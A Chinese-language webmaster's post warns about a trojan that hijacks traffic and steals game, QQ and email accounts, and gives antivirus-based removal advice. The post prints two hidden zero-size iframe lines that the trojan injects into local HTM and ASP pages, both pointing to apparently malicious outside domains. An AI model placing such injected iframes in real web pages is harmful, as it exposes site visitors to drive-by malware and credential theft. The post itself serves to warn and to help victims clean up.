经过笔者2天来的研究、8小时的测试,终于发现目前网络上最流行的收流量的木马,这里用其中一种来做说明。中了他们的木马后,不管你用什么杀毒软件,没有办法可以彻底杀掉,都会有残留的在上面,如果访问网络,又中了。经过分析,你只要中了后,会有14个病毒同时启动,然后有一个主程序每一秒变一次名称。然后引发其它木马。另外此病毒传播很厉害。会自动搜索你硬盘上的HTM文件和ASP的文件,并在每个页面里面自动添加以下代码。
<IFRAME SRC="http://www.5415.info/mo/11.htm" WIDTH=0 HEIGHT=0></IFRAME>
<IFRAME SRC="http://un.uiiiu.com/baidu.htm" WIDTH=0 HEIGHT=0></IFRAME>
笔者用了8个小时的时间做了测试,在这8个小时里重新恢复了系统6次。他在启动木马时,有9个是目前最流行的网游的盗号,如:大话西游、魔兽等。另外两个木马是广告调用程序,可以设置引发时间,我们抓到的这个是每30分钟在中了这种木马的机器上弹出一个网页,同时可以弹3个广告。另外2个程序是盗用QQ号和邮箱用的,技术很强,搜索到它要的目标后,以30秒的速度修改盗取的游戏号,并对修改后的密码和原密码一起发送到指定的邮箱。同时还集成了一个接口,此接口可以把盗取的号发送到指定的手机上。我们做了多次的验证,没有截取发送的邮箱和手机号,经过了层层加密。
本人的“好253网址之家”也差一点遭殃,就因中了这种这个木马,在更新网站时没有注意,传一个页面上去,但20秒我就发现不对,用自己编写的扫描工具扫了一下,发现所有的页面都在本地被注入了上面的代码。后面用工具清除,大家可以用瑞星最新了的病毒库升级后,可以删除上面注入的代码,但必须是最新的病毒库,否则无效。此病毒360安全卫士的人员监控了2个月,每3天升级一次。所以不可能用一个杀毒软件就想杀掉。
本人也把自己的两台电脑拿出来和笔者进行了测试,了解了病毒的厉害。此木马除了以上的体现外,还有就是在你的每个盘中创建一个启动项,Autorun.inf,创建了此文件后,当你双击打开硬盘后,弹出的是打开方式,不能打开硬盘,当你点右键你会发现,多了一个打开的功能。你不用去找,是找不出来的,在baidu里面一下,会出来一堆的解决方法,修改注册表等,没有用,那是以前的方法,现在不能用了,因它创建了此文件后,马上就改名,并会生成10个备份的。用360全安卫士3.6以上版本的可以扫描出Autorun.inf然后可以删除,但真正的运行病毒还在,用瑞星最新版和卡巴斯基可以扫出来,这里可以提取两个改名后的木马:(A001363.Sys、A0013658.Sys、a0012709.exe,从变种的名称是可以看后,前面的A是不变的,但后面的数值一直在变。)前提病毒库必须是最新的。前面说过,此木马每3天升一次,现在可以扫出来,3天后你中的话,不一定能扫出来。
此病毒测试参于人员:多名5、6年以上的站长,360百科全书资料提供、多名服务器安全管理员,好253网址负责整理。